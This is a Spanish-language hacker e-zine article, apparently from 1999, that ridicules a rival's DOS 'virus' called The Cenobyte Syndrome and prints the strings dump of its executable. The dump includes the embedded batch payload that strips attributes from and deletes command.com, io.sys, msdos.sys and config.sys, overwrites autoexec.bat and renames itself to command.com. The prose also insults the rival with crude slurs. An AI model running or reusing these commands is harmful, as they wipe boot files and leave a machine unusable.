10 The Cenobyte Syndrome, un virus elite
Al leer el articulo anterior, pudieron observar que el dijo haber hecho el virus en watcom c y en assembler (80x86). El virus en realidad no esta hecho en watcom c sino en Borland C++, y dudo mucho (demasiado), que tenga algo de assembler en el source code, salvo algo que pudo haber robado, porque no es capaz de generar nada propio.
Aqui tengo los exe, de dos de las versiones del 'virus' tcs. Al editar los exe podemos encontrar claramente el string del copyright, que dice Borland C++, y aunque no lo puedan creer, un bat metido dentro. Se ve que el virus, lo juro, no infecta absolutamente nada, sino que al ser ejecutado crea un bat y lo manda a ejecucion. Este bat borra, si leyeron bien borra, el io.sys, el command.com y el msdos.sys. Y como si fuera poco, y lo que no podia faltar porque el quiere figurar en todos lados, le mete al autoexec.bat un par de hechos que reberencian al grandisimo hijo de puta, bueno, grandisimo idiota de [Hellraiser], coronandose, ademas de lammer numero uno como el argentino mas fanatico de linux.
Me olvidaba, pone un string final que dice 'Game Over', clasico, el pibe lo unico que debe hacer en sus 'TEAMS' es jugar al Quake, como le pusieron en la board del Ezkracho TEAM.
Por si alguno no me cree, vean el strings del exe (aqui esta incluido el .bat que lleva en su interior).
-< /* que lo habias hecho en que el virus ? */ >-
Borland C++ - Copyright 1991 Borland Intl.
Null pointer assignment
Divide error
Abnormal program termination
-=<[ The Cenobyte Syndrome ]>=-
Programado por [Hellraiser]
Buenos Aires, Argentina 1999
echo CENOBYTE > com3
echo CENOBYTE > com4
=> %d <=
copy tcs.exe c:\ >NUL
attrib -h -s -r tcs.exe >NUL
del tcs.exe >NUL
cd \
attrib -r -s -h command.com >NUL
del command.com >NUL
attrib -h -r -s io.sys >NUL
del io.sys >NUL
attrib -h -r -s msdos.sys >NUL
del msdos.sys >NUL
echo @echo off > autoexec.bat
echo echo. >> autoexec.bat
echo echo -=<[ The Cenobyte Syndrome ]>=- >> autoexec.bat
echo echo. >> autoexec.bat
echo echo Has sido contaminado con el virus de [Hellraiser], el argentino >> autoexec.bat
echo echo mas fanatico de Linux. Gracias por usar productos Microsofts. >> autoexec.bat
echo echo. >> autoexec.bat
echo echo Programado por [Hellraiser]
echo pause >> autoexec.bat
del config.sys >NUL
ren tcs.exe command.com >NUL
Game Over
echo CENOBYTE > com3
echo CENOBYTE > com3
echo CENOBYTE > com3
echo CENOBYTE > com3
echo CENOBYTE > com3
echo CENOBYTE > com3
echo CENOBYTE > com3
echo CENOBYTE > com3
echo CENOBYTE > com3
echo CENOBYTE > com3
echo CENOBYTE > com4
echo CENOBYTE > com4
echo CENOBYTE > com4
echo CENOBYTE > com4
echo CENOBYTE > com4
echo CENOBYTE > com4
echo CENOBYTE > com4
echo CENOBYTE > com4
echo CENOBYTE > com4
echo CENOBYTE > com4
pause >NUL
pause >NUL
pause >NUL
pause >NUL
pause >NUL
pause >NUL
pause >NUL
pause >NUL
pause >NUL
pause >NUL
pause >NUL
(null)
COMPAQ
print scanf : floating point formats not linked
COMSPEC
COMSPEC
Como ven, es muy lammer este idiota. Hasta renombra su 'virus' como command.com. Es un gil de cuarta, es [Gilraiser].
Vaselin; "comprate un tarro porque aca llegue yo"